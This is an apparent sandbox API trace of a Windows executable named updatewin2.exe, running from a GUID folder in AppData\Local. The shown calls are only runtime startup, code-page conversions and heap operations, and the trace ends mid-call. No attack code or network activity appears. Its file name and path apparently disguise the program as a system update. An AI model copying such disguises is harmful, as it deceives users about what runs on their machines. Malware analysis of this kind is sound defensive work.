lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x09F\x07a`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0180.330] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f424, cbMultiByte=256, lpWideCharStr=0x18eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0180.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0180.330] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x18e968, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0180.330] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f224, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x09F\x07a`õ\x18", lpUsedDefaultChar=0x0) returned 256 [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x80) returned 0x8ba3e8 [0180.330] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x417ca8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe")) returned 0x5f [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0xc8) returned 0x8bc478 [0180.330] RtlInitializeSListHead (in: ListHead=0x417bc8 | out: ListHead=0x417bc8) [0180.330] GetLastError () returned 0x0 [0180.330] GetEnvironmentStringsW () returned 0x8bc548* [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xaca) returned 0x8bd020 [0180.330] FreeEnvironmentStringsW (penv=0x8bc548) returned 1 [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x98) returned 0x8bc548 [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x3e) returned 0x8bdb10 [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x6c) returned 0x8bc5e8 [0180.330] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x6e) returned 0x8bc660 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x78) returned 0x8a1180 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x62) returned 0x8bc6d8 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2e) returned 0x8a52d0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x48) returned 0x8bc748 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x28) returned 0x8ba470 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x1a) returned 0x8bc028 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x4a) returned 0x8bc798 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x72) returned 0x8a1200 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x30) returned 0x8a5308 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2e) returned 0x8a5340 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x1c) returned 0x8bc050 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0xd2) returned 0x8bc7f0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x7c) returned 0x8bc8d0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x36) returned 0x8bc958 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x3a) returned 0x8bdb58 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x90) returned 0x8bc998 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x24) returned 0x8bca30 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x30) returned 0x8a5378 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x36) returned 0x8bca60 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x48) returned 0x8bcaa0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x52) returned 0x8bcaf0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x3c) returned 0x8bdba0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x82) returned 0x8bcb50 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2e) returned 0x8a53b0 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x1e) returned 0x8bc078 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2c) returned 0x8a53e8 [0180.331] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x54) returned 0x8bcbe0 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x52) returned 0x8bcc40 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x2a) returned 0x8a5420 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x3c) returned 0x8bdbe8 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x54) returned 0x8bcca0 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x24) returned 0x8bcd00 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x30) returned 0x8a5458 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x8c) returned 0x8bcd30 [0180.332] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd020 | out: hHeap=0x890000) returned 1 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x8, Size=0x800) returned 0x8bcdc8 [0180.332] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0180.332] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402b17) returned 0x404e49 [0180.332] GetStartupInfoW (in: lpStartupInfo=0x18f590 | out: lpStartupInfo=0x18f590*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\6c6aafd4-f7f7-4f0c-8b07-1dd41571cbc8\\updatewin2.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x1423) returned 0x8beaf8 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x1423) returned 0x8bff28 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc118 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x18) returned 0x8bd5d0 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc140 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x30) returned 0x8a5490 [0180.332] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd5d0 | out: hHeap=0x890000) returned 1 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc168 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x48) returned 0x8bd5d0 [0180.332] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8a5490 | out: hHeap=0x890000) returned 1 [0180.332] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc190 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x60) returned 0x8bd620 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd5d0 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x90) returned 0x8bd688 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd620 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc1b8 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xd8) returned 0x8bd720 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd688 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc1e0 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc208 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x138) returned 0x8bd5d0 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd720 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc230 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc258 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc280 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc2a8 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x1c8) returned 0x8bd710 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd5d0 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc2d0 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc2f8 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc320 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc348 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x2a0) returned 0x8c1358 [0180.333] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd710 | out: hHeap=0x890000) returned 1 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc370 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc398 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc3c0 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc3e8 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc410 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8bc438 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1618 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1640 [0180.333] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x3f0) returned 0x8bd5d0 [0180.334] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1358 | out: hHeap=0x890000) returned 1 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1668 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1690 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c16b8 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c16e0 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1708 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1730 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1758 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1780 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c17a8 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x5e8) returned 0x8c1e00 [0180.334] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8bd5d0 | out: hHeap=0x890000) returned 1 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c17d0 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c17f8 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1820 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1848 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1870 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1898 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c18c0 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c18e8 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1910 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1938 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x8d0) returned 0x8c23f0 [0180.334] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c1e00 | out: hHeap=0x890000) returned 1 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1960 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1988 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c19b0 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c19d8 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1a00 [0180.334] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1a28 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1a50 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1a78 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1aa0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1ac8 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1af0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1b18 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1b40 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1b68 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1b90 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1bb8 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0xd38) returned 0x8c2cc8 [0180.335] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c23f0 | out: hHeap=0x890000) returned 1 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1be0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1c08 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1c30 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1c58 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1c80 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1ca8 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1cd0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1cf8 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1d20 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1d48 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1d70 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1d98 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1dc0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1e18 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1e40 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1e68 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1e90 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1eb8 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1ee0 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1f08 [0180.335] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1f30 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1f58 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1f80 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1fa8 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1fd0 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c1ff8 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2020 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2048 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x13eb) returned 0x8c3a08 [0180.336] HeapFree (in: hHeap=0x890000, dwFlags=0x0, lpMem=0x8c2cc8 | out: hHeap=0x890000) returned 1 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2070 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2098 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c20c0 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c20e8 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x30) returned 0x8a5490 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2110 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2138 [0180.336] RtlAllocateHeap (HeapHandle=0x890000, Flags=0x0, Size=0x20) returned 0x8c2160 [0180.336] RtlAllocateHeap 